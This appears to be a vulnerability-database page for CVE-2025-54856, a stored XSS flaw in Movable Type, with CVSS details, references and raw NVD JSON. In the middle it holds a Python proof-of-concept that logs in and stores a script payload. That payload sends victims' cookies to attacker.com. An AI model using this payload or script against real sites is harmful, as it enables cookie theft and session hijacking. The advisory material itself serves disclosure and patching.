CVE-2025-54856

Description

Movable Type contains a stored cross-site scripting vulnerability in Edit ContentData page. If crafted input is stored by an attacker with "ContentType Management" privilege, an arbitrary script may be executed on the web browser of the user who accesses Edit ContentData page.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Movable Type < 8.8.0

Movable Type < 7.16.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-54856 Movable Type Stored XSS PoC
# Target: Movable Type with ContentType Management privilege

TARGET_URL = "http://target-movable-type.com/"
USERNAME = "attacker_username"
PASSWORD = "attacker_password"

# XSS payload - can be modified for different purposes
XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'

def login(session, username, password):
    """Login to Movable Type and get session"""
    login_url = f"{TARGET_URL}/cgi-bin/mt/mt.cgi"
    data = {
        '__mode': 'login',
        'username': username,
        'password': password
    }
    response = session.post(login_url, data=data)
    return 'error' not in response.text

def exploit_stored_xss(session):
    """Store malicious XSS payload in ContentData"""
    # Navigate to ContentType Management
    content_url = f"{TARGET_URL}/cgi-bin/mt/mt.cgi"
    
    # Create or edit ContentData with XSS payload
    data = {
        '__mode': 'save',
        '_type': 'content_data',
        'content_field': XSS_PAYLOAD  # Inject XSS in content field
    }
    
    response = session.post(content_url, data=data)
    return response.status_code == 200

def main():
    session = requests.Session()
    
    if not login(session, USERNAME, PASSWORD):
        print("[-] Login failed")
        sys.exit(1)
    
    if exploit_stored_xss(session):
        print("[+] XSS payload stored successfully")
        print("[*] Wait for victim to access Edit ContentData page")
    else:
        print("[-] Exploitation failed")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-54856
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-54856
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-54856/
[4] VulDB https://vuldb.com/cve/CVE-2025-54856
[5] https://jvn.jp/en/jp/JVN24333679/
[6] https://movabletype.org/news/2025/10/mt-880-released.html
[7] https://www.sixapart.jp/movabletype/news/2025/10/22-1055.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-54856", "sourceIdentifier": "[email protected]", "published": "2025-10-23T05:15:32.583", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Movable Type contains a stored cross-site scripting vulnerability in Edit ContentData page. If crafted input is stored by an attacker with \"ContentType Management\" privilege, an arbitrary script may be executed on the web browser of the user who accesses Edit ContentData page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN24333679/", "source": "[email protected]"}, {"url": "https://movabletype.org/news/2025/10/mt-880-released.html", "source": "[email protected]"}, {"url": "https://www.sixapart.jp/movabletype/news/2025/10/22-1055.html", "source": "[email protected]"}]}}